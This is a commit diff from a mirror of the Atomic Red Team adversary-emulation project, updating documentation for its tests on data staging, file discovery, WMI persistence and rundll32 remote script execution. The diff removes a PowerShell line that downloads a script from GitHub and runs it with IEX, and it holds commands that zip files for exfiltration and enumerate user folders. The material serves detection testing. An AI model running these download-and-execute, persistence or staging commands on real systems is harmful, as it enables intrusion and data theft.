security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-04-03 15:04:00 +00:00
parent 7517911963
commit 3bc48cf815
7 changed files with 72 additions and 43 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1074/T1074.md
+22 -5
View File
@@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
<br/>
## Atomic Test #1 - Stage data from Discovery.bat
Utilize powershell to download discovery.bat and save to a local file
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP&#92;discovery.bat|
#### Attack Commands: Run with `powershell`!
```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file}
```
#### Cleanup Commands:
```powershell
Remove-Item -Force #{output_file} -ErrorAction Ignore
```
@@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
<br/>
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder&#92;T1074&#92;bin&#92;Folder_to_zip|
| output_file | Location to save zipped file or folder | Path | $env:TEMP&#92;Folder_to_zip.zip|
#### Attack Commands: Run with `powershell`!
```powershell
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
```
#### Cleanup Commands:
```powershell
Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
Remove-Item -Path #{output_file} -ErrorAction Ignore
```
atomics/T1083/T1083.md
+3 -3
View File
@@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the <code>ls</code
<br/>
## Atomic Test #1 - File and Directory Discovery (cmd.exe)
Find or discover files on the file system
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
all of the data discovery commands.
**Supported Platforms:** Windows
@@ -39,7 +40,6 @@ Find or discover files on the file system
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
@@ -55,7 +55,7 @@ tree /F >> %temp%\download
<br/>
## Atomic Test #2 - File and Directory Discovery (PowerShell)
Find or discover files on the file system
Find or discover files on the file system. Upon execution, file and folder information will be displayed.
**Supported Platforms:** Windows
atomics/T1084/T1084.md
+4 -6
View File
@@ -4,15 +4,14 @@
## Atomic Tests
- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
<br/>
## Atomic Test #1 - Persistence
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
## Atomic Test #1 - Persistence via WMI Event Subscription
Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
@@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
atomics/T1085/T1085.md
+1 -1
View File
@@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
<br/>
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
Test execution of a remote script using rundll32.exe
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
**Supported Platforms:** Windows
atomics/index.md
+1 -1
View File
@@ -141,7 +141,7 @@
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
atomics/index.yaml
+40 -26
View File
@@ -5075,11 +5075,10 @@ persistence:
modified: '2019-10-15T18:43:47.703Z'
identifier: T1084
atomic_tests:
- name: Persistence
- name: Persistence via WMI Event Subscription
description: |
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
@@ -5111,7 +5110,6 @@ persistence:
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
@@ -11663,7 +11661,8 @@ defense-evasion:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: 'Test execution of a remote script using rundll32.exe
description: 'Test execution of a remote script using rundll32.exe. Upon execution
notepad.exe will be opened.
'
supported_platforms:
@@ -17338,9 +17337,9 @@ discovery:
identifier: T1083
atomic_tests:
- name: File and Directory Discovery (cmd.exe)
description: 'Find or discover files on the file system
'
description: |
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
all of the data discovery commands.
supported_platforms:
- windows
executor:
@@ -17350,13 +17349,13 @@ discovery:
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
tree /F >> %temp%\download
- name: File and Directory Discovery (PowerShell)
description: 'Find or discover files on the file system
description: 'Find or discover files on the file system. Upon execution, file
and folder information will be displayed.
'
supported_platforms:
@@ -23689,7 +23688,8 @@ execution:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: 'Test execution of a remote script using rundll32.exe
description: 'Test execution of a remote script using rundll32.exe. Upon execution
notepad.exe will be opened.
'
supported_platforms:
@@ -27306,17 +27306,24 @@ collection:
identifier: T1074
atomic_tests:
- name: Stage data from Discovery.bat
description: 'Utilize powershell to download discovery.bat and save to a local
file
'
description: |
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
supported_platforms:
- windows
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
type: Path
default: "$env:TEMP\\discovery.bat"
executor:
name: powershell
elevation_required: false
command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'')
> pi.log
command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat"
-OutFile #{output_file}
'
cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
'
- name: Stage data from Discovery.sh
@@ -27334,21 +27341,28 @@ collection:
'
- name: Zip a Folder with PowerShell for Staging in Temp
description: 'Use living off the land tools to zip a file and stage it in the
Windows temporary folder for later exfiltration.
'
description: |
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
supported_platforms:
- windows
input_arguments:
input_file:
description: Location of file or folder to zip
type: Path
default: PathToAtomicsFolder\T1074\bin\Folder_to_zip
output_file:
description: Location to save zipped file or folder
type: Path
default: "$env:TEMP\\Folder_to_zip.zip"
executor:
name: powershell
elevation_required: false
command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip
-DestinationPath $env:TEMP\Folder_to_zip.zip
command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
-Force
'
cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction
Ignore
cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
'
'':
atomics/windows-index.md
+1 -1
View File
@@ -339,7 +339,7 @@
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]